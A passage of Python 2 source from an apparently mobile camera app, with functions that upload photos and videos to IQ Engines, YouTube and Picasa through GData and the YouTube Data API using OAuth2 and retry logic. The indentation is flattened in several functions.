        # Anything but a clean {'data': {'error': 0}} ack means failure.
        if response != {u"data": {"error": 0}}:
            return
        DebugPrint("\nIQEnginesPhotoUpload(): waiting for results...")
        response = iqe.update()
        DebugPrint(response)
        DebugPrint("IQEnginesPhotoUpload(): Time after update(): %s." % \
            GetCurrentDateTimeStringWithMilliseconds())
        DebugPrint("\nIQEnginesPhotoUpload(): retrieving results manually.")
        # time.sleep(2)
        # time.sleep(20)
        # time.sleep(60)
        # Give the recognition backend time, while keeping the watchdog fed.
        SleepAndPetWatchdog(60.0)
        response = iqe.result(qid)
        DebugPrint("IQEnginesPhotoUpload(): response = %s." % str(response))
        """
        Possible responses:
            {u'data': {u'results':
                [{u'color': u'Mostly gray brown, with some blue.',
                u'labels': u'Titan'}],
                u'error': 0}}.
            {u'data': {u'comment':
                u"The results for qid " \
                "82e6b37dfcd16b273cd861e21c74f8c0d7a0ba6c are not available yet",
                u'error': 0}}.
        """
        if int(response[u"data"][u"error"]) != 0:
            return
        # responseToDisplay = str(response[u"data"][u"results"][0][u"labels"])
        # Concatenate every non-error payload entry for display.
        responseToDisplay = ""
        for key in response[u"data"]:
            if key != "error":
                # print response[u"data"][key]
                responseToDisplay += str(response[u"data"][key])
        DebugPrint("IQEnginesPhotoUpload(): responseToDisplay = %s." % \
            responseToDisplay)
        #print "IQEnginesPhotoUpload(): response = %s. " \
        #    responseToDisplay = %s." % (str(response), responseToDisplay)
        DisplayNote("IQE tagged photo as %s." % responseToDisplay, -1.0)
        DebugPrint("IQEnginesPhotoUpload(): Time after result(): %s" % \
            GetCurrentDateTimeStringWithMilliseconds())
    except:
        DebugPrintErrorTrace()
# Cached gdata YouTubeService instance and a flag so ProgrammaticLogin()
# is only performed once per run (see ConnectToYouTubeGData()).
youtubeClient = None
youtubeClientAlreadyConnected = False
def ConnectToYouTubeGData():
    """Log in to the YouTube GData service with the stored credentials.

    On success sets the global youtubeClient (a ProgrammaticLogin'ed
    YouTubeService) and youtubeClientAlreadyConnected, returning None.
    On any exception the error details are logged (and optionally
    uploaded to the iCam server) and -1 is returned; a connect timeout
    additionally calls Quit().
    """
    global youtubeClient, youtubeClientAlreadyConnected
    DebugPrint("Entered ConnectToYouTubeGData().")
    try:
        youtubeClient = gdata.youtube.service.YouTubeService()
        youtubeClient.email = googleUsername
        # youtubeClient.email = "googleUser"
        youtubeClient.password = GetGooglePassword()
        # youtubeClient.password = ""
        #if True:
        if False:
            UploadByEmailAttachement(
                sender="googleUser@gmail.com",
                recipients=["alex.susu@gmail.com"],
                mediaPathFileName="/mnt/sdcard/external_sd/iCam/test.txt")
        youtubeClient.source = YOUTUBE_TEST_CLIENT_ID
        youtubeClient.developer_key = youtubeDeveloperKey
        youtubeClient.client_id = YOUTUBE_TEST_CLIENT_ID
        youtubeClient.ProgrammaticLogin()
        youtubeClientAlreadyConnected = True
    except:
        (exceptionType, exceptionValue, exceptionTraceback) = \
            sys.exc_info()
        errorStr = "Exception in ConnectToYouTubeGData() - details: " \
            "free_ram = %d. exceptionTraceback = %s, " \
            "exceptionType = %s, exceptionValue = %s. Bailing out..." % \
            (GetFreeRAM(),
            repr(traceback.format_tb(exceptionTraceback)),
            str(exceptionType), str(exceptionValue))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(errorStr)
        DebugPrintErrorTrace()
        # Bug fix: exceptionValue is an exception *object*, so comparing
        # it with == against a string never matched and the timeout
        # handling was dead code.  Compare the stringified message.
        if str(exceptionValue) == "The connect operation timed out":
            # str(exceptionType).find("socket.sslerror") #<class 'socket.sslerror'>
            Quit()
        return -1
"""
def YouTubeVideoUploadThroughProxy(pathFileName, fileName, aKeyword,
crtTime = None, mediaTimeStr = "", mediaDateStr = "", deviceId = "",
cameraId = 0):
DebugPrint("Entered YouTubeVideoUploadThroughProxy(pathFileName = %s, " \
"fileName = %s, aKeyword = %s)." % (pathFileName, fileName,
aKeyword))
youtubeProxyServerAddress = ICAM_GAE_SERVER_NAME
# Typical exception given: gaierror: (11001, 'getaddrinfo failed')
#youtubeProxyServerAddress = "http://localhost:8080"
#youtubeProxyServerAddress = "localhost:8080"
pageOnServer = "/proxyyoutube"
# Testing the get of proxyyoutube - it works ;)
if False:
try:
httpResponseString = urllib.urlopen("http://" + \
youtubeProxyServerAddress + pageOnServer).read()
DebugPrint("YouTubeVideoUploadThroughProxy(): " \
"httpResponseString = %s." % httpResponseString)
return
except:
DebugPrintErrorTrace()
# httpRequestHeader = {"Connection:": "Keep-alive",
# "Content-type": "application/x-gzip", "Accept": "text/plain"}
#User-agent
# httpRequestHeader = {"Content-type": "application/octet-stream",
# "Accept": "text/plain"}
httpRequestHeader = {
#"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; " \
# "rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17",
#"Accept": "text/plain",
"Accept": "text/plain",
#"Accept": "text/html,application/xhtml+xml,application/xml;" \
# "q=0.9,*.*;q=0.8",
#"Accept-Language": "en-us,en;q=0.5",
#"Accept-Encoding": "gzip,deflate",
#"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "1150",
#"Cookie": "ACSID=AJKY",
#"DNT": "1",
"Connection": "keep-alive",
#"Content-Type": "application/x-www-form-urlencoded",
"Content-type": "application/octet-stream",
#"Content-Length": "33"
}
# From http://forums.devshed.com/python-programming-11/httplib-urllib-how-do-i-keep-a-connection-open-142565.html:
# "there is a Connection: Keep-alive option that you can pass in the
# header, if you use HTTP/1.1 protocol."
try:
myHTTPConnection = httplib.HTTPConnection(youtubeProxyServerAddress)
#myHTTPConnection = httplib.HTTPConnection(youtubeProxyServerAddress, 8080)
fInput = open(pathFileName, "rb")
dataToUpload = fInput.read()
fInput.close()
#dataToUpload = "content=&img=CurrentSymLink_1.3gp"
myHTTPConnection.request("POST", pageOnServer, dataToUpload, \
httpRequestHeader)
# Get the response.
# From http://docs.python.org/library/httplib.html:
# "Note that you must have read the whole response before you can
# send a new request to the server."
httpResponse = myHTTPConnection.getresponse()
httpResponseString = httpResponse.read()
        DebugPrint("YouTubeVideoUploadThroughProxy(): " \
            "httpResponseString = %s." % httpResponseString)
#Close the connection.
myHTTPConnection.close()
except:
#if MY_DEBUG_STDERR:
# sys.stderr.write(myText + "\n")
DebugPrintErrorTrace()
"""
"""
btMediaTimeStr is in the format "%02d:%02d:%02d.%01d %02d-%02d-%04d" %
(tm_hour, tm_min, tm_sec, int((numMilliseconds + 50)/ 100), tm_mday,
tm_mon, tm_year)
btMediaDateStr is in the format "%04d-%02d-%02d" % (tm_year, tm_mon, tm_mday)
"""
class FileObjectWithLenForGdataMedia(file):
    """A real file object (Python 2 builtin ``file``) that additionally
    carries a ``len`` attribute with the file size, as the GData media
    upload code expects.
    """
    def __init__(self, aPathFileName, accessFlags):
        # Single inheritance, so calling the base initializer directly
        # is equivalent to the super() proxy form
        # (http://www.artima.com/weblogs/viewpost.jsp?thread=236275).
        file.__init__(self, aPathFileName, accessFlags)
        self.len = os.path.getsize(aPathFileName)
"""
We use FileObjectBufferWithLenForGdataMedia to upload media files
(video to YouTube) via a VIRTUAL file (data kept in RAM) handle.
This is USEFUL because if we give the file directly to the GData
YouTube API, in some cases the file handle to the file is kept
after returning from the Insert...() call, making impossible to
remove the file after uploading it.
GData API details:
- Picasa:
def InsertPhoto(self, album_or_uri, photo, filename_or_handle,
content_type='image/jpeg'):
- YouTube:
def InsertVideoEntry(self, video_entry, filename_or_handle,
youtube_username='default',
content_type='video/quicktime'):
"""
class FileObjectBufferWithLenForGdataMedia(file):
    """In-memory stand-in for a file handle, handed to the GData media
    upload API (see the module comment above: a real OS handle could be
    kept open by the API after Insert...(), preventing file deletion).
    Exposes the minimal protocol GData uses: len, name, seek(), read()
    and a no-op close().
    """
    # Current read position within dataToUpload.
    seekOffset = 0
    # File-name string reported via self.name (GData reads it).
    name = None
    # The whole media payload, kept in RAM.
    dataToUpload = None
    #def __init__(self, aPathFileName, accessFlags):
    def __init__(self, aDataToUpload, *args):
        """
        if (MY_DEBUG_STDOUT):
            print "Entered FileObjectWithLenForGdataMedia::__init__(args = %s)" % str(args)
            sys.stdout.flush()
        """
        """
        #"super returns proxy objects" - from http://www.artima.com/weblogs/viewpost.jsp?thread=236275
        super(FileObjectWithLenForGdataMedia, self).__init__(aPathFileName, accessFlags)
        self.len = os.path.getsize(aPathFileName)
        """
        # args[0] is the (path) file name to expose as self.name.
        self.dataToUpload = aDataToUpload
        self.len = len(aDataToUpload)
        self.name = args[0]
    def close(self, *args):
        """
        DebugPrint("Am in FileObjectBufferWithLenForGdataMedia::close(%s)" % \
            str(args))
        """
        # Intentionally a no-op: the RAM buffer needs no cleanup.
        pass
    def seek(self, *args):
        DebugPrint("Entered FileObjectBufferWithLenForGdataMedia::seek(%s)" % \
            str(args))
        # Only the absolute offset args[0] is honored.
        self.seekOffset = args[0]
    def read(self, *args):
        """
        DebugPrint("Entered " \
            "FileObjectWithLenForGdataMedia::read(args=%s)" \
            " (self.seekOffset = %d)" % \
            (str(args), self.seekOffset))
        """
        # Optional args[0] caps the number of bytes returned, mirroring
        # file.read(size); without it the remainder of the buffer is read.
        if len(args) < 1:
            res = self.dataToUpload[self.seekOffset : ]
        else:
            res = self.dataToUpload[self.seekOffset :
                self.seekOffset + args[0]]
        lenRes = len(res)
        self.seekOffset += lenRes
        """
        DebugPrint("FileObjectWithLenForGdataMedia::read(): " \
            "returning string of len %d, and made " \
            "self.seekOffset = %d." % \
            (lenRes, self.seekOffset))
        """
        return res
################NEW
import httplib2
import random
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient.http import MediaFileUpload
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# Retry/OAuth configuration for the YouTube Data API v3 resumable upload
# path (used by get_authenticated_service() / resumable_upload()).
# Explicitly tell the underlying HTTP transport library not to retry, since
# we are handling retry logic ourselves.
httplib2.RETRIES = 1
# Maximum number of times to retry before giving up.
MAX_RETRIES = 10
# Always retry when these exceptions are raised.
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, httplib.NotConnected,
    httplib.IncompleteRead, httplib.ImproperConnectionState,
    httplib.CannotSendRequest, httplib.CannotSendHeader,
    httplib.ResponseNotReady, httplib.BadStatusLine)
# Always retry when an apiclient.errors.HttpError with one of these status
# codes is raised.
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the {{ Google Cloud Console }} at
# {{ https://cloud.google.com/console }}.
# Please ensure that you have enabled the YouTube Data API for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = LOCAL_FOLDER + "client_secrets.json"
# This OAuth 2.0 access scope allows an application to upload files to the
# authenticated user's YouTube channel, but doesn't allow other types of access.
YOUTUBE_UPLOAD_SCOPE = "https://www.googleapis.com/auth/youtube.upload"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the {{ Cloud Console }}
{{ https://cloud.google.com/console }}
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
    CLIENT_SECRETS_FILE))
# Privacy statuses the YouTube Data API accepts for an uploaded video.
VALID_PRIVACY_STATUSES = ("public", "private", "unlisted")
def get_authenticated_service(args):
    """Return an authorized YouTube Data API v3 service object.

    Loads cached OAuth2 credentials from LOCAL_FOLDER, running the
    interactive OAuth flow (run_flow with *args*) only when no valid
    cached credentials exist, then builds the API client on an
    authorized httplib2.Http transport.
    """
    oauthFlow = flow_from_clientsecrets(
        CLIENT_SECRETS_FILE,
        scope=YOUTUBE_UPLOAD_SCOPE,
        message=MISSING_CLIENT_SECRETS_MESSAGE)
    credentialStore = Storage(LOCAL_FOLDER + "upload_video-oauth2.json")
    credentials = credentialStore.get()
    needNewCredentials = (credentials is None) or credentials.invalid
    if needNewCredentials:
        credentials = run_flow(oauthFlow, credentialStore, args)
    authorizedHttp = credentials.authorize(httplib2.Http())
    return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
                 http=authorizedHttp)
# This method implements an exponential backoff strategy to resume a
# failed upload.
def resumable_upload(insert_request):
response = None
error = None
retry = 0
while response is None:
try:
print "Uploading file..."
status, response = insert_request.next_chunk()
if response is not None:
if 'id' in response:
print "Video id '%s' was successfully uploaded." % response['id']
else:
exit("The upload failed with an unexpected response: %s" % response)
except HttpError, e:
if e.resp.status in RETRIABLE_STATUS_CODES:
error = "A retriable HTTP error %d occurred:\n%s" % (e.resp.status,
e.content)
else:
raise
except RETRIABLE_EXCEPTIONS, e:
error = "A retriable error occurred: %s" % e
if error is not None:
print error
retry += 1
if retry > MAX_RETRIES:
exit("No longer attempting to retry.")
max_sleep = 2 ** retry
sleep_seconds = random.random() * max_sleep
print "Sleeping %f seconds and then retrying..." % sleep_seconds
time.sleep(sleep_seconds)
################NEW
def YouTubeVideoUpload(pathFileName, fileName, aKeyword, crtTime=None,
mediaTimeStr="", mediaDateStr="", aDeviceId="", cameraId=0,
aBatteryLevel=-1, aChargerStatus=-1):
"""
Note:
The fileName is the time when was given start recording (note that at least
on Symbian there might be a small delay before actually starting to
record).
The (YouTube) videoDescription represents the time we entered
UploadStateAndFileAndStoreState().
"""
global youtubeClient, youtubeClientAlreadyConnected
global YOUTUBE_TEST_CLIENT_ID, googleUsername, youtubeDeveloperKey
#aKeyword += " " + btNetSearchKeywords
DebugPrint("Entered YouTubeVideoUpload(pathFileName=%s, fileName=%s, " \
"aKeyword=%s, aBatteryLevel=%d, aChargerStatus=%d)." % \
(pathFileName, fileName, aKeyword, \
aBatteryLevel, aChargerStatus))
DebugPrint("YouTubeVideoUpload(): file size=%d" % \
os.path.getsize(pathFileName));
if WINDOWS_CE_OS_PYTHONCE:
DebugPrint("YouTubeVideoUpload(): WinCE doesn't have yet libssl so " \
"cannot perform secure connection to Google --> Bailing " \
"out without uploading video.")
return -1
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
connResult = ConnectToYouTubeGData()
"""
If connResult == -1 then don't continue (most likely bad
username/passwd).!!!!
"""
ytRes = 0
fInput = None
fInputAux = None
try:
"""
self.assertEquals(youtubeClient.developer_key, youtubeDeveloperKey)
self.assertEquals(youtubeClient.client_id, YOUTUBE_TEST_CLIENT_ID)
self.assertEquals(youtubeClient.additional_headers["X-GData-Key"],
"key=" + youtubeDeveloperKey)
self.assertEquals(youtubeClient.additional_headers["X-Gdata-Client"],
YOUTUBE_TEST_CLIENT_ID)
"""
# videoTitle = "my cool video " + str(random.randint(1000,5000))
# videoFileName = os.path.split(pathFileName)[1]
# videoTitle = pathFileName [: len(pathFileName) - 4]
# videoTitle = fileName[: len(fileName) - 4]
#videoTitle = fileName[:len(fileName) - 4] + "_" + aDeviceId
videoTitle = fileName[:len(fileName) - 4] # Should contain deviceId and cameraId
"""
#videoDescription = "description " + str(random.randint(1000,5000))
videoDescription = time.strftime("%H:%M:%S %d-%m-%Y ", crtTime) + \
aDeviceId + ", " + str(cameraId) #($mediaFileSize bytes)
# crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday, crtTime.tm_hour
# crtTime.tm_min, crtTime.tm_sec #fileName
"""
if crtTime is None:
videoDescription = mediaTimeStr + " " + aDeviceId + ":" + \
str(cameraId) # ($mediaFileSize bytes)
else:
try:
numMilliseconds = int(mediaTimeStr)
theRest = int((numMilliseconds + 50) / 100)
except:
theRest = "*"
#if MY_DEBUG_STDERR:
# sys.stderr.write(myText + "\n")
DebugPrintErrorTrace()
#videoDescription = time.strftime("%H:%M:%S.* %d-%m-%Y", crtTime) \
# + " " + aDeviceId + ", " + str(cameraId) #($mediaFileSize bytes)
videoDescription = time.strftime("%H:%M:%S." + str(theRest) + \
" %d-%m-%Y", crtTime) + " " + \
aDeviceId + ", " + str(cameraId) #($mediaFileSize bytes)
videoDescription += " " + "%02d%%" % aBatteryLevel + \
" " + "%d" % aChargerStatus
"""
import random
developerTag01 = "tag" + str(random.randint(1000, 5000))
developerTag02 = "tag" + str(random.randint(1000, 5000))
developerTag03 = "tag" + str(random.randint(1000, 5000))
"""
"""
developerTag01 = videoTitle
developerTag02 = videoTitle
developerTag03 = videoTitle
"""
"""
From http://osdir.com/ml/youtube-api-gdata/2010-02/msg00091.html:
"developer tags need to be between 3 and 25 characters"
"""
developerTag01 = aDeviceId + " " + str(cameraId) + " " + btNetSearchKeywords
developerTag02 = str(cameraId) + "**" #!!!!TODO use function RepairGoogleKeywords()
developerTag03 = aDeviceId
################NEW
youtube = get_authenticated_service([])
# From initialize_upload()
try:
body=dict(
snippet=dict(
title=videoTitle,
description=videoDescription,
tags=developerTag01,
categoryId=None #options.category
),
status=dict(
privacyStatus="private"
)
)
# Call the API's videos.insert method to create and upload the video.
insert_request = youtube.videos().insert(
part=",".join(body.keys()),
body=body,
# The chunksize parameter specifies the size of each chunk of data, in
# bytes, that will be uploaded at a time. Set a higher value for
# reliable connections as fewer chunks lead to faster uploads. Set a lower
# value for better recovery on less reliable connections.
#
# Setting "chunksize" equal to -1 in the code below means that the entire
# file will be uploaded in a single HTTP request. (If the upload fails,
# it will still be retried where it left off.) This is usually a best
# practice, but if you're using Python older than 2.6 or if you're
# running on App Engine, you should set the chunksize to something like
# 1024 * 1024 (1 megabyte).
#media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)
media_body=MediaFileUpload(pathFileName, chunksize=-1, resumable=True)
)
resumable_upload(insert_request)
except HttpError, e:
print "An HTTP error %d occurred:\n%s" % (e.resp.status, e.content)
return
################NEW
"""
aDuration = gdata.media.Duration()
aDuration.seconds = "10"
print "aDuration =", aDuration
"""
"""
#!!!!
# Set geographic location to 37,-122 lat, long
where = gdata.geo.Where()
where.set_location((37.0,-122.0))
videoEntry = gdata.youtube.YouTubeVideoEntry(media=myMediaGroup, geo=where)
"""
"""
See also
https://gdata-python-client.googlecode.com/svn/trunk/pydocs/gdata.media.html#Private
Alex: From C:\Python27\Lib\site-packages\gdata\media\__init__.py
private = True,
#Doesn't work - it gives AttributeError: 'bool' object has
# no attribute '_BecomeChildElement'
duration = aDuration,
'People & Blogs'
"""
myMediaGroup = gdata.media.Group(
title=gdata.media.Title(text=videoTitle),
description=gdata.media.Description(description_type="plain",
text=videoDescription),
keywords=gdata.media.Keywords(text=aKeyword),
private=gdata.media.Private(),
category=[gdata.media.Category(text="People",
scheme="http://gdata.youtube.com/schemas/2007/categories.cat",
label="People")],
player=None
)
DebugPrint("YouTubeVideoUpload(): myMediaGroup = %s." % myMediaGroup)
# return
# self.assert_(isinstance(myMediaGroup, gdata.media.Group))
videoEntry = gdata.youtube.YouTubeVideoEntry(media=myMediaGroup)
myDeveloperTags = [developerTag01, developerTag02, developerTag03]
devTags = videoEntry.AddDeveloperTags(myDeveloperTags)
"""
for dev_tag in devTags:
self.assert_(dev_tag.text in myDeveloperTags)
self.assert_(isinstance(videoEntry, gdata.youtube.YouTubeVideoEntry))
"""
"""
# <?xml version='1.0' encoding='UTF-8'?>
# <ns0:updated xmlns:ns0="http://www.w3.org/2005/Atom">
# 2011-04-08T08:15:05.000Z
# </ns0:updated>
print "videoEntry.updated =", videoEntry.updated
# Use updated instead. It is ONLY the recorded date (without time):
# <?xml version='1.0' encoding='UTF-8'?>
# <ns0:recorded xmlns:ns0="http://gdata.youtube.com/schemas/2007">
# 2011-04-08
# </ns0:recorded>
print "videoEntry.recorded =", videoEntry.recorded
#Somehow add
<ns1:location xmlns:ns1="http://gdata.youtube.com/schemas/2007">
44.419314, 26.159509 geo:alt=100
</ns1:location>
"""
newVideoEntry = None
# try:
if False:
fInput = FileObjectWithLenForGdataMedia(pathFileName, "rb")
fInputAux = open(pathFileName, "rb")
dataToUpload = fInputAux.read()
fInputAux.close()
fInput = FileObjectBufferWithLenForGdataMedia(dataToUpload, \
pathFileName, "rb")
"""
print "fInput =", fInput
print "fInput.len =", fInput.len
if isinstance(fInput, file):
print "fInput is of type file :)"
"""
newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry, fInput)
# Normally fInput gets closed in InsertVideoEntry().
"""
except:
ytRes = -1
exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()
errorStr = "Exception in YouTubeVideoUpload() - details: " \
"free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s. " \
"Bailing out..." % \
(
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue)
)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
return ytRes
"""
"""
# Doesn't work on Python 2.2 (e.g, PyS60 1.4.5)
finally:
fInput.close()
DebugPrint("YouTubeVideoUpload(): Closed the file (attempted to) " \
"uploaded to YouTube.")
"""
if ADD_VIDEO_TO_PLAYLIST:
# ################################################################
# Put the newly added video in the corresponding playlist (create
# the playlist if it doesn't exist)
# ################################################################
# playlistTitle = aDeviceId + ": " + \
# time.strftime("%Y-%m-%d", crtTime) + (", %d" % cameraId)
if crtTime is None:
playlistTitle = aDeviceId + ": " + mediaDateStr + ", %d" % \
cameraId
else:
playlistTitle = aDeviceId + ": " + \
time.strftime("%Y-%m-%d", crtTime) + ", %d" % cameraId
playlistDescription = playlistTitle
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different
to the Google username!!!!!!!!
feed = youtubeClient.GetYouTubePlaylistFeed(
username="MultiEnder123") #NOT "ender123"?
"""
feed = youtubeClient.GetYouTubePlaylistFeed()
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "feed =", feed
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
#myEntry.id.text = \
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
# print " myEntryIdStr = %s" % myEntryIdStr
if playlistTitle == myEntryTitle:
playlistToUse = myEntry
break
if playlistToUse is None:
# Create the playlist if it was not found.
# Returns: The YouTubePlaylistEntry if successfully posted.
playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
playlistTitle, playlist_private=False)
# It seems this info is not used!
aVideoTitle = ""
# It seems this info is not used!
aVideoDescription = ""
playlistURI = playlistToUse.feed_link[0].href
# time.sleep(10) #!!!!!!!!!!!!!Maybe required
response = \
youtubeClient.AddPlaylistVideoEntryToPlaylist(playlistURI,
newVideoEntry.id.text.split("/")[-1], aVideoTitle,
aVideoDescription)
except:
#newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
# pathFileName)
ytRes = -1
try:
if fInput is not None:
fInput.close()
if fInputAux is not None:
fInputAux.close()
DebugPrint("YouTubeVideoUpload(): Closed (or attempted to) the " \
"file uploaded to YouTube.")
except:
DebugPrintErrorTrace()
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
errorStr = \
"Exception in YouTubeVideoUpload() - details: free_ram = %d. " \
"exceptionTraceback = %s, exceptionType = %s, " \
"exceptionValue = %s. Bailing out..." % \
(GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
"""
Since we had an error when uploading to YouTube, then save the media
file to the Unsent folder.
# storeLocallyMedia == 0 because in case we don't store it THEN we
# save it in Unsent.
"""
if (storeLocallyMedia == 0) and (useiCamServer != 2):
if saveUnsentPackets > 0:
"""
Note: we could save this file in LOCAL_FOLDER_MEDIA, but in
LOCAL_FOLDER_UNSENT_FILES is more appropriate.
"""
MoveFileBetweenAnyDrives(pathFileName,
LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
TreatException("YouTubeVideoUpload()")
return ytRes
# Module-level Picasa client state: one shared gdata PhotosService connection,
# lazily created/logged-in by ConnectToPicasaGData() on first upload.
picasaClient = None
picasaClientAlreadyConnected = False
def ConnectToPicasaGData(aDeviceId=deviceId):
    """Create and log in the shared Picasa (gdata Photos) client.

    On success sets the module globals picasaClient and
    picasaClientAlreadyConnected (returns None).  On failure logs and
    (optionally) uploads the error details, returns -1, and quits the
    application when the failure is a connect timeout.

    aDeviceId -- device identifier used only for error reporting.
    """
    global picasaClient, picasaClientAlreadyConnected
    DebugPrint("Entered ConnectToPicasaGData().")
    try:
        # Initialize the client and do a programmatic (username/password)
        # Google login.
        picasaClient = gdata.photos.service.PhotosService()
        picasaClient.email = googleUsername
        picasaClient.password = GetGooglePassword()
        picasaClient.source = "iCam Client"
        picasaClient.ProgrammaticLogin()
        picasaClientAlreadyConnected = True
    except:
        (exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
        errorStr = "Exception in ConnectToPicasaGData() - details: " \
                    "free_ram = %d. exceptionTraceback = %s, " \
                    "exceptionType = %s, exceptionValue = %s. " \
                    "Bailing out..." % \
                    (GetFreeRAM(),
                     repr(traceback.format_tb(exceptionTraceback)),
                     str(exceptionType), str(exceptionValue))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(errorStr)
        DebugPrintErrorTrace()
        """
        Example of exception that I am "hunting":
        Exception in ConnectToPicasaGData() - details: ...
        exceptionType = , exceptionValue = The connect operation timed out. Bailing out...
        """
        # BUG FIX: exceptionValue is an exception *object*; comparing it with
        # == against a plain string was always False, so the intended Quit()
        # on connect timeout was unreachable.  Match on its string form.
        if "The connect operation timed out" in str(exceptionValue):
            Quit()
        return -1
#!!!!TODO: add in Picasa description aBatteryLevel, aChargerStatus.
def PicasaPhotoUpload(pathFileName, fileName=None, aKeyword="", crtTime=None,
                mediaTimeStr="", mediaDateStr="", aDeviceId="", cameraId=0,
                aBatteryLevel=-1, aChargerStatus=-1, aData=None):
    # Upload one photo to Picasa, either from disk (aData is None) or from an
    # in-memory buffer (aData holds the bytes).  The photo goes into a
    # per-device/per-day album named "<deviceId>: <date>, <cameraId>", which is
    # created on demand.  On failure the media file may be moved to the Unsent
    # folder and -1 is returned; None is returned on success.
    global picasaClient, picasaClientAlreadyConnected
    DebugPrint("Entered PicasaPhotoUpload(pathFileName=%s, fileName=%s, " \
                "aKeyword=%s, aBatteryLevel=%d, aChargerStatus=%d)." % \
                (pathFileName, fileName, aKeyword, \
                 aBatteryLevel, aChargerStatus))
    DebugPrint(" PicasaPhotoUpload(): mediaTimeStr=%s, mediaDateStr=%s, " \
                "aDeviceId=%s, cameraId=%s." % \
                (str(mediaTimeStr), str(mediaDateStr), str(aDeviceId), \
                 str(cameraId)))
    #DebugPrint(" PicasaPhotoUpload(): aData=%s ." % str(aData))
    fInput = None
    # Lazily import gdata and establish the shared Picasa session.
    if picasaClientAlreadyConnected == False:
        if gdataModulesImported == False:
            ImportGdataModules()
        ConnectToPicasaGData()
    try:
        # Give the album a unique title by appending the current time.
        #test_album = picasaClient.InsertAlbum('Python library test' +
        #    str(GetTime()), 'A temporary test album.')
        #albumFeed = picasaClient.GetUserFeed(kind = "album")
        #albumFeed = picasaClient.GetUserFeed(kind = ["album", "photo"])
        #albumFeed = picasaClient.GetUserFeed(kind = ["album", "photo",
        #    "comment", "tag"], user = "ender123")
        # These don't work probably (just in YouTube's client case) because
        # the gdata server doesn't answer requests to
        # http(s)://picasaweb.google.com.
        #albumFeed = picasaClient.GetEntry(
        #    "http://picasaweb.google.com/data/feed/api/user/" + "ender123") #None
        #albumFeed = picasaClient.GetEntry(
        #    "https://picasaweb.google.com/data/feed/api/user/" + "ender123") #None
        # print "albumFeed =", albumFeed
        # albumTitle = time.strftime("%Y-%m-%d", time.localtime(crtTime))
        # albumTitle = time.strftime("%Y-%m-%d", crtTime)
        # crtTime is None when the caller supplies a preformatted date string.
        if crtTime is None:
            albumTitle = aDeviceId + ": " + mediaDateStr + ", %d" % cameraId
        else:
            albumTitle = aDeviceId + ": " + time.strftime("%Y-%m-%d",
                            crtTime) + ", %d" % cameraId
        DebugPrint(" PicasaPhotoUpload(): albumTitle=%s ." % str(albumTitle))
        iCamAlbumFound = False
        """
        From https://code.google.com/apis/picasaweb/docs/1.0/developers_guide_python.html#ListAlbums
        (less important:
        https://code.google.com/apis/picasaweb/docs/2.0/developers_guide_protocol.html#ListAlbums)
        """
        # albumsFeed = picasaClient.GetUserFeed(kind = "album", user = "ender123")
        albumsFeed = picasaClient.GetUserFeed(kind="album")
        """
        # IMPORTANT NOTE: it does not print the album list - I believe
        # BECAUSE THE tostring() METHOD DOESN'T DUMP THE ALBUMS LIST :))
        DebugPrint("albumsFeed = %s" % str(albumsFeed))
        """
